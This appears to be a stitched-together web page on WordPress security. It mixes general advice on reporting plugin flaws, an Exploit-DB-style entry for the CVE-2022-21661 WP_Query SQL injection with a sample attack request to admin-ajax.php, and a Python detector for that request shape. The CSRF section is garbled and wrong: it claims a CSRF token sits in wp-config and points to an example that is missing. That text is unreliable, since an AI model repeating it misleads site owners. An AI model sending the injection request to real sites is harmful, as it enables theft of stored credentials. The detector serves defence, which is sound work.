If you have any questions regarding this, do not hesitate to reach out to us on Twitter or via email. We would be more than happy to assist you.

WordPress has a large community of users and developers backing it, which has led to a high number of plugins and themes being created for it. However, due to the sheer number of these, it is not uncommon for some of them to have a security issue. If you are using one of these plugins or themes, and notice anything strange happening on your site, do not hesitate to report it to the developer.

How to check if your site is vulnerable to CSRF

If you have a WordPress site and notice something strange happening on it, do not hesitate to report it to the developer. If a plugin or theme is vulnerable to CSRF, then any user with malicious intent can hijack the website by loading an infected page.
The easiest way for you to check if your website is vulnerable is by looking for suspicious activity in the logs. You can find this information by accessing your wp-config file and looking for a CSRF token like below:

Summary:

The Importance of Reporting Security Issues
Although WordPress has a large community, it is not uncommon for some plugins and themes to have security issues. If you notice anything strange happening on your site, you should report it to the developer so they can take care of the issue.

What You Should Know Before Using WordPress

WordPress is an open source platform, which means that anyone can modify it and use it for free. This also means that anyone can make a plugin or theme for the platform and post it online in the hopes that others find it useful. Before using a WordPress plugin or theme, you must always do some research to ensure that they are not going to cause any problems on your site.

Exploit

# Exploit Title: WordPress Core 5.8.2 - 'WP_Query' SQL Injection
# Date: 11/01/2022
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/download/releases
# Version: < 5.8.3
# Tested on: Windows 10
# CVE : CVE-2022-21661

# [ VULNERABILITY DETAILS ] : 

# This vulnerability allows remote attackers to disclose sensitive information on affected installations of WordPress Core.
# Authentication is not required to exploit this vulnerability. The specific flaw exists within the WP_Query class.
# The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries.
# An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise.

# [ References ] : 

https://wordpress.org/news/category/releases
https://www.zerodayinitiative.com/advisories/ZDI-22-020
https://hackerone.com/reports/1378209

# [ Sample Request ] :

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.99
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Connection: close 
Content-Type: application/x-www-form-urlencoded

action=<action_name>&nonce=a85a0c3bfa&query_vars={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}
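
A defensive check for the request shape in the sample above, as an added example that is not part of the original advisory or of WordPress itself: it decodes the `query_vars` field of a form-encoded POST body and reports `term_taxonomy_id` terms that are not plain integers. The function names and the benign sample body (including its `load_posts` action) are constructed for illustration, and only the JSON form of `query_vars` shown above is covered.

```python
import json
import re
from urllib.parse import parse_qs

ASCII_INT = re.compile(r"[0-9]+")

# Constructed sample bodies; the first mirrors the request shape shown above.
SAMPLE_FLAGGED = ('action=<action_name>&nonce=a85a0c3bfa&query_vars='
                  '{"tax_query":{"0":{"field":"term_taxonomy_id","terms":["<inject>"]}}}')
SAMPLE_BENIGN = ('action=load_posts&query_vars='
                 '{"tax_query":[{"field":"term_taxonomy_id","terms":[12,"34"]}]}')


def non_integer_terms(node):
    """Walk a decoded tax_query and collect term_taxonomy_id terms that are not integers."""
    found = []
    if isinstance(node, dict):
        if node.get("field") == "term_taxonomy_id":
            terms = node.get("terms", [])
            terms = terms if isinstance(terms, list) else [terms]
            found += [t for t in terms if not ASCII_INT.fullmatch(str(t).strip())]
        children = node.values()  # clauses may be nested under "0", "1", ...
    elif isinstance(node, list):
        children = node
    else:
        return found
    for child in children:
        found += non_integer_terms(child)
    return found


def inspect_body(body):
    """Return suspicious terms found in the query_vars field of a form-encoded POST body."""
    hits = []
    for raw in parse_qs(body).get("query_vars", []):
        try:
            decoded = json.loads(raw)
        except ValueError:
            continue  # not JSON; outside the scope of this check
        if isinstance(decoded, dict):
            hits += non_integer_terms(decoded.get("tax_query"))
    return hits


if __name__ == "__main__":
    for body in (SAMPLE_FLAGGED, SAMPLE_BENIGN):
        print(inspect_body(body))
```

A non-empty result is a triage signal for captured request bodies on sites still in the affected range given above (< 5.8.3).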

Timeline

Published on: 01/06/2022 23:15:00 UTC
Last modified on: 04/12/2022 18:47:00 UTC

References